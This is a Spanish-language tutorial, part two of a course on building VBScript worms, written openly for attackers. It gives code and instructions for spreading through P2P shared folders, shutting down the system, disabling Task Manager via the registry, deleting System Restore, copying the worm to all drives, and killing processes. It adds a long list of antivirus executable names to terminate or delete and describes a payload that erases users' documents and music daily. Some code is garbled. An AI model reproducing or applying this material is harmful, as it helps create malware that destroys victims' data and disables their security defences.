CURSO: CREACION DE WORMS EN VBS 2 PARTE POR: ZEUS34

Bueno, esta es la segunda parte del curso que estoy haciendo para aprender las principales tcnicas para la creacin de Worms, que no es tan fcil Bueno, para comenzar con este curso, quiero decir que no pretendo con este ensear las grandes tcnicas, solo lo bsico, luego, dejar que ustedes usen su imaginacin. Ok? Quedando todo esto claro, quiero agradecer a todos los que ha seguido este curso Y para los que se perdieron la 1 parte, la pueden descargar desde: http://rapidshare.com/files/42356522/WORMS_CURSO.zip.html Atte: ZEUS34

CURSO: CREACION DE WORMS EN VBS 2 PARTE :::::INICIO DE LA TRANSMICIN::::: ::::::::::::::::::::::: Ok, aqu les presento el men que conformar esta 2 parte del curso: 1.2.3.4.5.6.7.COMENZANDO CON EL WORM 5.22PG EL WORM EN S3PG TECNICAS DE OCULTACIN DIFICULTAR LA DESINFECCION PAYLOADS PAYLOADS (2) ANTIDETECCION-ANTIVIRUS

OK, YA PRESENTADO, CREO QUE ES MOMENTO DE COMENZAR: 1.- COMENZANDO CON EL WORM 5.2 Bueno, el Worm ya tiene las principales funciones, que son las de copiarse, las de infectar carpetas, que es lo principal ahora, la pricipal funcion de un Worm, es reproducirse, para lo que hay muchos mtodos, como el spamming en el Messenger, o los motores SMTP, o la propagacion P2P, que es la propagacin a traves de los programas llamados Peer2Peer, como es el LimeWire, Ares, EDONKEY200, etc Este metodo de propagacin es muy fcil, debido a esto, esta sera la que explicar. Bueno, para que nuestro Worm se pueda mover a gusto por las redes P2P, solo hace falta copiarse en las carpetas donde se guarda las descargas por ejemplo, en eMule la carpeta se llama incoming copiandose en esta carpeta, ya podrs navegar por las redes de eMule. Para los que quieran poner en prctica este mtodo, les dejo la lista de las carpetas de los dierentes programas P2P: Grokster My Grokster Morpheus My Shared Folder ICQ shared files KaZaA My Shared Folder KaZaA Lite My Shared Folder EDONKEY2000 incoming eMule Incoming Filetopia3 Files appleJuice incoming Gnucleus Downloads LimeWire Shared Overnet incoming Shareaza Downloads POR ZEUS34 2

CURSO: CREACION DE WORMS EN VBS 2 PARTE Swaptor Download WinMX My Shared Folder Tesla Files XoloX Downloads Rapigator Share KMD My Shared Folder BearShare Shared Direct Connect Received Files Bueno, solo con copiarnos en cada una de estas carpetas, ya podremos navegar por las redes de los programas P2P.

2.- EL WORM EN S Ya nuestro programa esta preparado para hacer todas sus funciones principales, como copiarse, reproducirse Supongo que con lo ya escrito, podrn fabricar el suyo a gusto pero siempre surgen problemas o dudas, de Cmo se hace esto?, Cmo se hace lo otro?... Ok. Este capitulo esta dedicado a explicar todo eso NUMEROS ALEATORIOS Generalmente, los nmeros aleatorios se utilizan para generar las payloads, por ejemplo, si un numero es mayo a 10, que se reinicie, y cosas asi. FECHA DEL SISTEMA Otro de los recursos preferidos por los programadores para generar payloads, ok? Todo esto lo vamos a ver en el tema PAYLOADS. Pero mientras tanto, vamos a poner mi direccion de correo, para que me manden sus preguntas, ok? ||||||||||||||||||||||||||||||||| |irlandeses_jokerman@hotmail.com| ||||||||||||||||||||||||||||||||| Para cualquier duda, mandenme un mail a mi direccion de correo (mencionada renglones antes), y preguntenme. Ok?

POR ZEUS34

CURSO: CREACION DE WORMS EN VBS 2 PARTE 3.- TCNICAS DE OCULTACIN Este captulo es de vital importancia, ya que si o nos ocultramos, los usuarios nos detectaran a simple vista, verdad?. Bueno, las principales tcnicas de ocultacin son las clsicas: -poner nombres influyentes -si vas a mostrar ventanas, que tengan ttulos comprensibles, como Firewall, Winsock, etc. -escribir y dejar archivos preparados, solo para copiarlos con extencion .vbs en momentos crticos. Bueno, eso. Ahora, el ltimo punto puede ser confuso, verdad? Para dejar archivos ocultos, primero hay que escribirlos, y despus cambiarles la extendi a vbs. Mi Word llamado RED-COMBO, se apoyaba constantemente de archivos .bat, y de archivos .vbs. Cmo que se apoyaba?. Bien, simple: lo program para que generara nmeros aleatorios, y si el numero era divisible entre 2, generaba un archivo bat, despus lo ejecutaba. Bien, voy a citar esa parte de mi Worm: Set mett = CreateObject(Scripting.FileSystemObject) Randomize Numero=int(rnd*20) If Numero=2/0 Then Set winsock = mett.CreateTextFile (C:\winsock.txt, True) winsock.WriteLine shutdown r t 15 winsock.Close mett.CopyFile C:\winsock.txt,C:\winsock.bat Set moce = CreateObject(WScript.Shell) moce.Run C:\winsock.bat Bien, esto lo que hace es escribir un archivo de texto, con la instruccin bat para apagar el sistema, luego lo copia con la extensin .bat, y luego lo ejecuta. Pero el chiste no es copiar el archivo inmediatamente solo usarlo como ultimo recurso por ejemplo, hay que programar el Word para que este revisando cada determinado tiempo si existe uno de las copias que hicimos del Word, en caso de que no existiera, que significara que el usuario ya save que est ifectado, que copiara ese archivo, y que lo ejecutara. De esa manera, el usuario se intimidara y ya no borrara ninguna copia de nuestro Word, ok? Otra forma es bloquearle al usuario el uso del Administrador de Tareas.

POR ZEUS34

CURSO: CREACION DE WORMS EN VBS 2 PARTE Para esto, creamos el siguiente cdigo: Set meca = CreateObject(WScript.Shell) meca.RegWrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Sy stem\Disabletaskmgr.exe Ok, con esto, dejaramos a el usuario sin su preciado Administrador de Tareas, asi dificultando que nos encuentren. Pasemos al siguiente tema. 4.-DIFICULTAR LA DESINFECCIN Para dificultar la desinfeccin de nuestro Word, hay que eliminar varias aplicaciones a las que el usuario puede recurrir si se da cuenta de que esta infectado. Para dejarlo sin estas herramientas, hay que eliminarlas, simplemente. Por ejemplo, hay una que se llama Restaurar Sistema que sirve para que Windows regrese a un punto en el pasado en el que o estaba infectado an. Para eliminar esta herramienta, ha que poner el siguiente code: Set meca = CreateObject(Scripting.FileSystemObject) meca.DeleteFolder C:\Documents and Settings\All Users\Men Inicio\Programas\Accesorios\Herramientas del sistema\Restaurar sistema.ink Con esto, ya dejamos a nuestra vctima sin un puto de apoyo. Bueno, aqu entra un apoyo para nuestro Word, que es un programa Batch, que os ayudar a cancelarle el uso de el Administrador de tareas: Code: Shell reg add Hkcu\software\microsoft\windows\currentversion\policies\sys tem /v disabletaskmgr /t reg_dword /d 1 /f Ok, si el usuario quiere desactivar ese proceso, ya no lo va a poder hacer, porque va a tener restringido el acceso a esa funcion. Recuerda que todos los codes en Batch los tienes que aplicar escribiendo el archivo y luego copiandolo, como lo mostre en la cita de mi Word, OK? Pasemos al siguiente tema.

POR ZEUS34

CURSO: CREACION DE WORMS EN VBS 2 PARTE 4.-PAYLOADS Bueno, tal vez este sea el tema mas esperado por muchos de los lectores de este Curso; el tema de los Payloads Wajajajajaja. Ok, ya. Bueno, para empezar: Qu son los Payloads? R: los Payloads son las cargas utiles de cualquier virus, que se activan en determinado tiempo, y que son Dainas o no Dainas. Por alguna razn, los virus siempre tienen la clsica cosa de que: si se activa a tal hora de tal dia, se activa el payload, si no, no eso es demaciado aburrido verdad? Por eso yo program mi Word para que todos los dias, a las 10:00 de la maana, borrara todos los archivos .doc, .mp3, .vbs, .vbe Entonces, asi la victima se da cuenta de que esta ifectada, entrando en pnico Wajajajaja Bueno, este tema, es mas para ver que son las payloads, en el prximo vamos a ver unos cuantos consejos para que sus payloads, sean las mas originales y dainas. Sigamos!!! 5.-PAYLOADS (2) Bien, cualquier, repito, cualquier payload debe de tener al menos 1 instruccin para buscar y destruir ok, hace rato lei un articulo de Hendrix, y me llego una idea como caida del cielo Programar al Word para que en un Bucle, busque y se copie en todos los Discos Duros de la victima Bueno, para los que no capten la idea, les voya regalar esa pequea funcion: Set meca = CreateObject(Scripting.FileSystemObject) If Year(Now))=2007 Then Do If (meca.FolderExists C:\)) = True Then meca.CopyFile wscript.scriptfullname,C:\Winsock.txt.vbs End if if (meca.FolderExists D:\)) = True Then meca.CopyFile wscript.scriptfullname,D\:Winsock.txt.vbs End if Loop Muy bien, solo les resta poner todos los Discos Duros, asi se asegurarn que estan en todos, solo resta programarlo para que los ejecute Ok? POR ZEUS34 6

CURSO: CREACION DE WORMS EN VBS 2 PARTE Bueno, recuerden que este curso, solo es de orientacin, ok?... ustedes tienen que armar sus propios virus, si no, solo exisitiran un par de virus diferentes, verdad?. Bueno, pasemos a el siguiente tema 7.- ANTIDETECCION-ANTIVIRUS Tal vez el tema mas esperado por muchos, que es la forma de cmo evadir a los antivirus Bueno, muchos han de pensar que solo con eliminar los ejecutables de los antivirus, pasamos desapercibidos (la verdad no tengo ni idea si funcione), bueno pero investigando, me di cuenta que hay que cancelar varios procesos, como el escaner cotinuo del AV bueno, un amigo me proporcion un cdigo que para procesos pero en el caso de la mejor heurstica del mercado, hay que hacer algo mas complejo bueno, el punto es: si un virus puede parar al NOD32, puede hacerlo todo, osea que su programador es un genio!!!. Ok, a ese codigo, mi amigo le puso Codigo Metaprocesos: CODE: see("msmsgs.exe") 'Aqui va el nombre del proceso sub see(processname) set WM =getobject("winmgmts:") set listservices= WM.instancesof("win32_process") For each oService in listservices if processname=oService.name then oService.Terminate end if next end sub

Bueno ah esta el code pero no todos los procesos se pueden parar con este code bueno, si quieres intentar con los ejecutables de los AVS, aqu esta la lista de los nombres de ejecutables de todos los antivirus que existen: Algunas de las cadenas que aparecen aqui son parte del nombre, osea si hay ejecutables por ejemplo de nombre: AVNxxx , AVNyyy , AVNzzz solo se considera la cadena AVN, por lo que al hacer las comparaciones en el virus con los nombres de archivo no se debe usar la condicion de NombreArchivo=Cadena , sino si NombreArchivo contiene a Cadena:

POR ZEUS34

CURSO: CREACION DE WORMS EN VBS 2 PARTE Apvxdwin Avtask Psimsvc Avciman Liteupg Lupgconf pavFnSvr Pavprot Prevsrv sporder Upgtest Webproxy Wizsos vsmon zatutor zonealarm zlclient assist cfgconv kpf4gui kpf4ss Smc Updater fpavupdm F-prot F-Sched FP-Win F-STOPW AVERT Stinger RegWorks BackupSrv Startup w9xpopen clamscan ClamTray ClamWin freshclam sigtool WClose nod32 nod32krn nod32kui nodutils xcommsvr bdc bdss bdinit bdlite bdmcon bdswitch POR ZEUS34 8

CURSO: CREACION DE WORMS EN VBS 2 PARTE bdoesrv bdnews bdnagent bdnews bdoesrv bdswitch lvuptst8 register rtvr upgrepl vsserv bdinit bdlite bdmcon bdnagent bdnews bdswitch lvuptst8 mrgtest register upgrepl rtvr vsserv vrupdate VrSche vrrw32 vrres vrmonnt VRescue DosDisk _vr32w VrBScan vrd Vrmon vrmonsvc syncer astart32 avast32 avbug avcrdata avenhcd avlogtxt avmaisrv avpopwiz avserver rguard32 quick32 lguard32 avupdate avsinfo avsimple POR ZEUS34 9

CURSO: CREACION DE WORMS EN VBS 2 PARTE Avcheck Avclear Averr Avinicyp Maketask Tmcr Download th32upd Th32updl Thtask Thsm bootup avgcc avgupdln _inst32 Avg Avgcc32 Avginet Avgscan Avgse Avgserv9 Avgvv Avgw avgamsvr Bootup Zapd Zapprg Zaps Zapupd Zcap kav kavsend kavsvc ashEnhcd ashAvast ashBug ashChest ashDisp ashLogV ashMaiSv ashPopWz ashQuick ashServ ashSimpl ashSkPcc ashSkPck ashCmd aswBoot aswRegSvr aswUpd sched POR ZEUS34 10

CURSO: CREACION DE WORMS EN VBS 2 PARTE ave Avgctrl Avnt AVSCHED32 Avwin Delus Guardgui Inetupd Reboot aswclnr wincheck proces ok, ah esta el listado de los ejecutables solo basta con programar el Word para que los busque, y si existen, los elimine bueno, con esto doy por terminada la 2 parte del curso CREACION DE WORMS EN VBScript RECUERDEN QUE LA 3 PARTE ESTAR DEDICADA EXCLUSIVAMENTE A PRACTICAS, Y A EXTRAS , ADEMS DE CONTENER UNAS CUANTAS SORPRESAS, PARA PONR EN EL CODE DEL WORM POR CIERTO, EN LA 3 PARTE, LES ENSEAR UNA NUEVA TECNICA DE PROPAGACION: ENVIARSE A IP`S.!!!!! YEAH! VENGA! BUENO HASTA AQUI LLEGA LA 2 PARTE DEL CURSO :::::::::::::::::::::::::::::: :::::FIN DE LA TRANSMICIN::::: ::::::::::::::::::::::::::::::

Espero hayan disfrutado esta parte del curso, porque me esforze mucho, y recuerden que todo lo saco de mi cabeza, no he recibido ayuda de nadie!! Salu2!!

POR ZEUS34

11